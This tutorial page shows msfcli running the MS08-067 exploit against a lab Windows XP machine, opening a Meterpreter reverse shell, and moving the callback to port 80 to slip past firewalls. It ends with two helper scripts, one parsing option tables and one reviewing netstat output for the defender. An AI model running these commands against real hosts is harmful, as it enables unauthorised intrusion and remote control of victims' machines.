Last updated: ID:8oMokgzXIg, 2012-04-09 (Mon) 19:22:23
msfcli is a tool that runs a penetration test with the options given on the command line. It is suited to jobs such as running routine, fixed tests from a script.
Even if you do not remember every option, you can run it fairly interactively, checking things as you go. However, each start-up takes some time, so when the options are not yet clear it is better to start msfconsole instead.
root@bt:~# msfcli -h
Usage: /opt/metasploit/msf3/msfcli <exploit_name> <option=value> [mode]
=======================================================================

    Mode           Description
    ----           -----------
    (A)dvanced     Show available advanced options for this module
    (AC)tions      Show available actions for this auxiliary module
    (C)heck        Run the check routine of the selected module
    (E)xecute      Execute the selected module
    (H)elp         You're looking at it baby!
    (I)DS Evasion  Show available ids evasion options for this module
    (O)ptions      Show available options for this module
    (P)ayloads     Show available payloads for this module
    (S)ummary      Show information about this module
    (T)argets      Show available targets for this exploit module
As a trial, use windows/smb/ms08_067_netapi. To execute a module, set the mode to E and run.
root@bt:~# msfcli windows/smb/ms08_067_netapi E
[*] Please wait while we load the module tree...
[-] Exploit failed: The following options failed to validate: RHOST.
[*] Exploit completed, but no session was created.
Hmm. Apparently an option is missing. Let's find out which options are needed.
root@bt:~# msfcli windows/smb/ms08_067_netapi O
[*] Please wait while we load the module tree...

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
RHOST is a required parameter and has no default value. Set RHOST and run again.
root@bt:~# msfcli windows/smb/ms08_067_netapi RHOST=172.16.104.156 E
[*] Please wait while we load the module tree...
RHOST => 172.16.104.156
[*] Started reverse handler on 172.16.104.151:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:Japanese
[*] Selected Target: Windows XP SP2 Japanese (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 172.16.104.156
[*] Meterpreter session 1 opened (172.16.104.151:4444 -> 172.16.104.156:1062) at 2012-04-05 21:50:10 -0400

meterpreter > shell
Process 1800 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter ローカル エリア接続 2:

        Connection-specific DNS Suffix  . : localdomain
        IP Address. . . . . . . . . . . . : 172.16.104.156
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 172.16.104.2

Ethernet adapter Bluetooth ネットワーク接続:

        Media State . . . . . . . . . . . : Media disconnected

C:\WINDOWS\system32>netstat -a
netstat -a

Active Connections

  Proto  Local Address                 Foreign Address        State
  TCP    nososhik-78vdlt:epmap         nososhik-78vdlt:0      LISTENING
  TCP    nososhik-78vdlt:microsoft-ds  nososhik-78vdlt:0      LISTENING
  TCP    nososhik-78vdlt:1025          nososhik-78vdlt:0      LISTENING
  TCP    nososhik-78vdlt:netbios-ssn   nososhik-78vdlt:0      LISTENING
  TCP    nososhik-78vdlt:1064          172.16.104.151:4444    ESTABLISHED
  UDP    nososhik-78vdlt:microsoft-ds  *:*
  UDP    nososhik-78vdlt:isakmp        *:*
  UDP    nososhik-78vdlt:1032          *:*
  UDP    nososhik-78vdlt:4500          *:*
  UDP    nososhik-78vdlt:ntp           *:*
  UDP    nososhik-78vdlt:1900          *:*
  UDP    nososhik-78vdlt:ntp           *:*
  UDP    nososhik-78vdlt:netbios-ns    *:*
  UDP    nososhik-78vdlt:netbios-dgm   *:*
  UDP    nososhik-78vdlt:1900          *:*
The remote shell was obtained without trouble.
However, the local port is 4444 and the remote port is 1064. A firewall would normally block this, so change it so that the remote host connects back to port 80 on the local machine.
Let's check which payloads are available.
root@bt:~# msfcli windows/smb/ms08_067_netapi RHOST=172.16.104.156 P
[*] Please wait while we load the module tree...

Compatible payloads
===================

   Name                                             Description
   ----                                             -----------
   generic/custom                                   Use custom string or file as payload. Set either PAYLOADFILE or PAYLOADSTR.
   generic/debug_trap                               Generate a debug trap in the target process
   generic/shell_bind_tcp                           Listen for a connection and spawn a command shell
   generic/shell_reverse_tcp                        Connect back to attacker and spawn a command shell
   generic/tight_loop                               Generate a tight loop in the target process
   windows/adduser                                  Create a new user and add them to local administration group
   windows/dllinject/bind_ipv6_tcp                  Listen for a connection over IPv6, Inject a Dll via a reflective loader
   windows/dllinject/bind_nonx_tcp                  Listen for a connection (No NX), Inject a Dll via a reflective loader
   windows/dllinject/bind_tcp                       Listen for a connection, Inject a Dll via a reflective loader
   windows/dllinject/reverse_http                   Tunnel communication over HTTP, Inject a Dll via a reflective loader
   windows/dllinject/reverse_ipv6_http              Tunnel communication over HTTP and IPv6, Inject a Dll via a reflective loader
   windows/dllinject/reverse_ipv6_tcp               Connect back to the attacker over IPv6, Inject a Dll via a reflective loader
   windows/dllinject/reverse_nonx_tcp               Connect back to the attacker (No NX), Inject a Dll via a reflective loader
   windows/dllinject/reverse_ord_tcp                Connect back to the attacker, Inject a Dll via a reflective loader
   windows/dllinject/reverse_tcp                    Connect back to the attacker, Inject a Dll via a reflective loader
   windows/dllinject/reverse_tcp_allports           Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject a Dll via a reflective loader
   windows/dllinject/reverse_tcp_dns                Connect back to the attacker, Inject a Dll via a reflective loader
   windows/download_exec                            Download an EXE from an HTTP URL and execute it
   windows/exec                                     Execute an arbitrary command
   windows/loadlibrary                              Load an arbitrary library path
   windows/messagebox                               Spawns a dialog via MessageBox using a customizable title, text & icon
   windows/meterpreter/bind_ipv6_tcp                Listen for a connection over IPv6, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
   windows/meterpreter/bind_nonx_tcp                Listen for a connection (No NX), Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
   windows/meterpreter/bind_tcp                     Listen for a connection, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
   windows/meterpreter/reverse_http                 Tunnel communication over HTTP, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
   windows/meterpreter/reverse_https                Tunnel communication over HTTP using SSL, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
   windows/meterpreter/reverse_ipv6_http            Tunnel communication over HTTP and IPv6, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
   windows/meterpreter/reverse_ipv6_https           Tunnel communication over HTTP using SSL and IPv6, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
   windows/meterpreter/reverse_ipv6_tcp             Connect back to the attacker over IPv6, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
   windows/meterpreter/reverse_nonx_tcp             Connect back to the attacker (No NX), Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
   windows/meterpreter/reverse_ord_tcp              Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
   windows/meterpreter/reverse_tcp                  Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
   windows/meterpreter/reverse_tcp_allports         Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
   windows/meterpreter/reverse_tcp_dns              Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
   windows/metsvc_bind_tcp                          Stub payload for interacting with a Meterpreter Service
   windows/metsvc_reverse_tcp                       Stub payload for interacting with a Meterpreter Service
   windows/patchupdllinject/bind_ipv6_tcp           Listen for a connection over IPv6, Inject a custom DLL into the exploited process
   windows/patchupdllinject/bind_nonx_tcp           Listen for a connection (No NX), Inject a custom DLL into the exploited process
   windows/patchupdllinject/bind_tcp                Listen for a connection, Inject a custom DLL into the exploited process
   windows/patchupdllinject/reverse_ipv6_tcp        Connect back to the attacker over IPv6, Inject a custom DLL into the exploited process
   windows/patchupdllinject/reverse_nonx_tcp        Connect back to the attacker (No NX), Inject a custom DLL into the exploited process
   windows/patchupdllinject/reverse_ord_tcp         Connect back to the attacker, Inject a custom DLL into the exploited process
   windows/patchupdllinject/reverse_tcp             Connect back to the attacker, Inject a custom DLL into the exploited process
   windows/patchupdllinject/reverse_tcp_allports    Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject a custom DLL into the exploited process
   windows/patchupdllinject/reverse_tcp_dns         Connect back to the attacker, Inject a custom DLL into the exploited process
   windows/patchupmeterpreter/bind_ipv6_tcp         Listen for a connection over IPv6, Inject the meterpreter server DLL (staged)
   windows/patchupmeterpreter/bind_nonx_tcp         Listen for a connection (No NX), Inject the meterpreter server DLL (staged)
   windows/patchupmeterpreter/bind_tcp              Listen for a connection, Inject the meterpreter server DLL (staged)
   windows/patchupmeterpreter/reverse_ipv6_tcp      Connect back to the attacker over IPv6, Inject the meterpreter server DLL (staged)
   windows/patchupmeterpreter/reverse_nonx_tcp      Connect back to the attacker (No NX), Inject the meterpreter server DLL (staged)
   windows/patchupmeterpreter/reverse_ord_tcp       Connect back to the attacker, Inject the meterpreter server DLL (staged)
   windows/patchupmeterpreter/reverse_tcp           Connect back to the attacker, Inject the meterpreter server DLL (staged)
   windows/patchupmeterpreter/reverse_tcp_allports  Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject the meterpreter server DLL (staged)
   windows/patchupmeterpreter/reverse_tcp_dns       Connect back to the attacker, Inject the meterpreter server DLL (staged)
   windows/shell/bind_ipv6_tcp                      Listen for a connection over IPv6, Spawn a piped command shell (staged)
   windows/shell/bind_nonx_tcp                      Listen for a connection (No NX), Spawn a piped command shell (staged)
   windows/shell/bind_tcp                           Listen for a connection, Spawn a piped command shell (staged)
   windows/shell/reverse_http                       Tunnel communication over HTTP, Spawn a piped command shell (staged)
   windows/shell/reverse_ipv6_http                  Tunnel communication over HTTP and IPv6, Spawn a piped command shell (staged)
   windows/shell/reverse_ipv6_tcp                   Connect back to the attacker over IPv6, Spawn a piped command shell (staged)
   windows/shell/reverse_nonx_tcp                   Connect back to the attacker (No NX), Spawn a piped command shell (staged)
   windows/shell/reverse_ord_tcp                    Connect back to the attacker, Spawn a piped command shell (staged)
   windows/shell/reverse_tcp                        Connect back to the attacker, Spawn a piped command shell (staged)
   windows/shell/reverse_tcp_allports               Try to connect back to the attacker, on all possible ports (1-65535, slowly), Spawn a piped command shell (staged)
   windows/shell/reverse_tcp_dns                    Connect back to the attacker, Spawn a piped command shell (staged)
   windows/shell_bind_tcp                           Listen for a connection and spawn a command shell
   windows/shell_reverse_tcp                        Connect back to attacker and spawn a command shell
   windows/speak_pwned                              Causes the target to say "You Got Pwned" via the Windows Speech API
   windows/upexec/bind_ipv6_tcp                     Listen for a connection over IPv6, Uploads an executable and runs it (staged)
   windows/upexec/bind_nonx_tcp                     Listen for a connection (No NX), Uploads an executable and runs it (staged)
   windows/upexec/bind_tcp                          Listen for a connection, Uploads an executable and runs it (staged)
   windows/upexec/reverse_http                      Tunnel communication over HTTP, Uploads an executable and runs it (staged)
   windows/upexec/reverse_ipv6_http                 Tunnel communication over HTTP and IPv6, Uploads an executable and runs it (staged)
   windows/upexec/reverse_ipv6_tcp                  Connect back to the attacker over IPv6, Uploads an executable and runs it (staged)
   windows/upexec/reverse_nonx_tcp                  Connect back to the attacker (No NX), Uploads an executable and runs it (staged)
   windows/upexec/reverse_ord_tcp                   Connect back to the attacker, Uploads an executable and runs it (staged)
   windows/upexec/reverse_tcp                       Connect back to the attacker, Uploads an executable and runs it (staged)
   windows/upexec/reverse_tcp_allports              Try to connect back to the attacker, on all possible ports (1-65535, slowly), Uploads an executable and runs it (staged)
   windows/upexec/reverse_tcp_dns                   Connect back to the attacker, Uploads an executable and runs it (staged)
   windows/vncinject/bind_ipv6_tcp                  Listen for a connection over IPv6, Inject a VNC Dll via a reflective loader (staged)
   windows/vncinject/bind_nonx_tcp                  Listen for a connection (No NX), Inject a VNC Dll via a reflective loader (staged)
   windows/vncinject/bind_tcp                       Listen for a connection, Inject a VNC Dll via a reflective loader (staged)
   windows/vncinject/reverse_http                   Tunnel communication over HTTP, Inject a VNC Dll via a reflective loader (staged)
   windows/vncinject/reverse_ipv6_http              Tunnel communication over HTTP and IPv6, Inject a VNC Dll via a reflective loader (staged)
   windows/vncinject/reverse_ipv6_tcp               Connect back to the attacker over IPv6, Inject a VNC Dll via a reflective loader (staged)
   windows/vncinject/reverse_nonx_tcp               Connect back to the attacker (No NX), Inject a VNC Dll via a reflective loader (staged)
   windows/vncinject/reverse_ord_tcp                Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged)
   windows/vncinject/reverse_tcp                    Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged)
   windows/vncinject/reverse_tcp_allports           Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject a VNC Dll via a reflective loader (staged)
   windows/vncinject/reverse_tcp_dns                Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged)
Specify PAYLOAD and run.
root@bt:~# msfcli windows/smb/ms08_067_netapi RHOST=172.16.104.156 PAYLOAD=windows/meterpreter/reverse_tcp E
[*] Please wait while we load the module tree...
RHOST => 172.16.104.156
PAYLOAD => windows/meterpreter/reverse_tcp
[-] Exploit failed: The following options failed to validate: LHOST.
[*] Exploit completed, but no session was created.
It seems LHOST has to be specified as well. Check the options once more.
root@bt:~# msfcli windows/smb/ms08_067_netapi RHOST=172.16.104.156 PAYLOAD=windows/meterpreter/reverse_tcp O
[*] Please wait while we load the module tree...

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    172.16.104.156   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port
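Both "failed to validate" errors on this page can be predicted from the O-mode tables alone: msfcli refuses to run while any option marked Required has an empty Current Setting. The script below is an added example, not code from this page or from Metasploit. It parses the fixed-width tables that O mode prints, using the header's column offsets rather than splitting on whitespace (an empty setting would otherwise shift "yes" into the wrong column), and lists the options that would fail. The two sample tables are constructed to mirror the page's first and second O runs; their column spacing is reconstructed, not copied from the page.

```python
"""Predict msfcli's "options failed to validate" result from an O-mode dump.

Added example (not part of the original page or of Metasploit): parses the
fixed-width option tables printed by `msfcli <module> ... O` and reports each
option whose Required column is "yes" and whose Current Setting is empty.
"""

# Constructed to mirror the page's first O run (nothing set yet).
SAMPLE_FIRST_RUN = """\
[*] Please wait while we load the module tree...

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
"""

# Constructed to mirror the page's second O run (RHOST and PAYLOAD set):
# the exploit table is followed by the payload's own option table.
SAMPLE_SECOND_RUN = """\
[*] Please wait while we load the module tree...

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    172.16.104.156   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port
"""

HEADER_COLUMNS = ("Name", "Current Setting", "Required", "Description")
FIELDS = ("name", "setting", "required", "description")


def _column_starts(header):
    """Character offset at which each column title begins in a header line."""
    return [header.index(col) for col in HEADER_COLUMNS]


def parse_option_tables(text):
    """Return one dict per option row across every table in the dump.

    Rows are sliced at the header's column offsets, so an empty Current
    Setting cell survives as '' instead of being collapsed away.
    """
    rows = []
    starts = None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped.startswith("Name") and all(c in line for c in HEADER_COLUMNS):
            starts = _column_starts(line)      # a new table begins
            continue
        if starts is None or not stripped or stripped.startswith("----"):
            continue
        if not line.startswith(" "):
            starts = None                      # unindented line: status text, table over
            continue
        bounds = starts + [len(line)]
        cells = [line[bounds[i]:bounds[i + 1]].strip() for i in range(len(starts))]
        rows.append(dict(zip(FIELDS, cells)))
    return rows


def missing_required(text):
    """Option names msfcli would list in 'The following options failed to validate'."""
    return [r["name"] for r in parse_option_tables(text)
            if r["required"].lower() == "yes" and r["setting"] == ""]


if __name__ == "__main__":
    print("first run  ->", missing_required(SAMPLE_FIRST_RUN))
    print("second run ->", missing_required(SAMPLE_SECOND_RUN))
```

Run on the two samples it reports RHOST for the first table and LHOST for the second, matching the two error messages above; LPORT passes validation because it carries the default 4444, which is why the page only notices that default when reading the table.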
Ah, so this is where LPORT is set to 4444. OK then, specify LHOST and LPORT and run.
root@bt:~# msfcli windows/smb/ms08_067_netapi RHOST=172.16.104.156 PAYLOAD=windows/meterpreter/reverse_tcp LHOST=172.16.104.151 LPORT=80 E
[*] Please wait while we load the module tree...
RHOST => 172.16.104.156
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 172.16.104.151
LPORT => 80
[*] Started reverse handler on 172.16.104.151:80
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:Japanese
[*] Selected Target: Windows XP SP2 Japanese (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 172.16.104.156
[*] Meterpreter session 1 opened (172.16.104.151:80 -> 172.16.104.156:1031) at 2012-04-05 22:07:19 -0400

meterpreter > shell
Process 4024 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>netstat -an
netstat -an

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    127.0.0.1:1025         0.0.0.0:0              LISTENING
  TCP    172.16.104.156:139     0.0.0.0:0              LISTENING
  TCP    172.16.104.156:1030    172.16.104.155:139     TIME_WAIT
  TCP    172.16.104.156:1031    172.16.104.151:80      ESTABLISHED
  UDP    0.0.0.0:445            *:*
  UDP    0.0.0.0:500            *:*
  UDP    0.0.0.0:1032           *:*
  UDP    0.0.0.0:4500           *:*
  UDP    127.0.0.1:123          *:*
  UDP    127.0.0.1:1900         *:*
  UDP    172.16.104.156:123     *:*
  UDP    172.16.104.156:137     *:*
  UDP    172.16.104.156:138     *:*
  UDP    172.16.104.156:1900    *:*

C:\WINDOWS\system32>
It worked.
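The two netstat listings on this page make a useful point for the defending side: the same Meterpreter session shows up first as an ESTABLISHED connection to 172.16.104.151:4444 and then, after the listener was moved, to 172.16.104.151:80. An egress rule that only blocks port 4444 catches the first and misses the second, whereas a host-side review of established sessions against the peers the machine is expected to talk to surfaces both regardless of port. The script below is an added example, not code from this page or from Metasploit. It parses both netstat output forms seen here (`netstat -a` with host and service names, `netstat -an` with numeric addresses), extracts the ESTABLISHED TCP sessions, and flags those whose remote host is not on an allowlist. The two samples are constructed from the page's listings with reconstructed spacing, and the allowlist containing the page's default gateway 172.16.104.2 is an assumption made for the demonstration.

```python
"""Review Windows `netstat -a` / `netstat -an` output for unexpected peers.

Added example (not part of the original page or of Metasploit). The remote
port is deliberately ignored: the page shows one session on 4444 and, after a
change of listener, on 80, so only the remote host is compared to an allowlist.
"""
from collections import namedtuple

Conn = namedtuple("Conn", "proto local_host local_port remote_host remote_port state")

# Constructed from the page's first session (`netstat -a`, names, listener on 4444).
NETSTAT_A = """\
Active Connections

  Proto  Local Address                 Foreign Address        State
  TCP    nososhik-78vdlt:epmap         nososhik-78vdlt:0      LISTENING
  TCP    nososhik-78vdlt:microsoft-ds  nososhik-78vdlt:0      LISTENING
  TCP    nososhik-78vdlt:1064          172.16.104.151:4444    ESTABLISHED
  UDP    nososhik-78vdlt:ntp           *:*
"""

# Constructed from the page's second session (`netstat -an`, listener on 80).
NETSTAT_AN = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    127.0.0.1:1025         0.0.0.0:0              LISTENING
  TCP    172.16.104.156:139     0.0.0.0:0              LISTENING
  TCP    172.16.104.156:1030    172.16.104.155:139     TIME_WAIT
  TCP    172.16.104.156:1031    172.16.104.151:80      ESTABLISHED
  UDP    0.0.0.0:445            *:*
  UDP    172.16.104.156:137     *:*
"""


def _split_endpoint(endpoint):
    """Split 'host:port' at the last colon; handles names, IPv4 and '*:*'."""
    host, _, port = endpoint.rpartition(":")
    return host, port


def parse_netstat(text):
    """One Conn per TCP/UDP row; the banner and header lines are skipped."""
    conns = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3 or parts[0] not in ("TCP", "UDP"):
            continue
        lhost, lport = _split_endpoint(parts[1])
        rhost, rport = _split_endpoint(parts[2])
        state = parts[3] if len(parts) > 3 else ""   # UDP rows carry no state
        conns.append(Conn(parts[0], lhost, lport, rhost, rport, state))
    return conns


def established(text):
    """TCP sessions currently exchanging data with a peer (TIME_WAIT excluded)."""
    return [c for c in parse_netstat(text)
            if c.proto == "TCP" and c.state == "ESTABLISHED"]


def unexpected_peers(text, allowed_peers):
    """Established sessions whose remote host is not an expected peer.

    allowed_peers: hosts (names or IPs) this machine is expected to talk to,
    such as the gateway, proxy, DNS and update servers.
    """
    return [c for c in established(text) if c.remote_host not in allowed_peers]


if __name__ == "__main__":
    # Assumed allowlist for the demonstration: only the page's default gateway.
    allowed = {"172.16.104.2"}
    for label, sample in (("netstat -a", NETSTAT_A), ("netstat -an", NETSTAT_AN)):
        for c in unexpected_peers(sample, allowed):
            print(f"{label}: unexpected session {c.local_host}:{c.local_port} "
                  f"-> {c.remote_host}:{c.remote_port}")
```

With that allowlist the script reports the session to 172.16.104.151 in both listings, on 4444 and on 80 alike; a port-based rule would have reported only the first. In practice the allowlist is built from the host's known servers, and a review like this is paired with `netstat -ano` so the owning process ID can be checked as well.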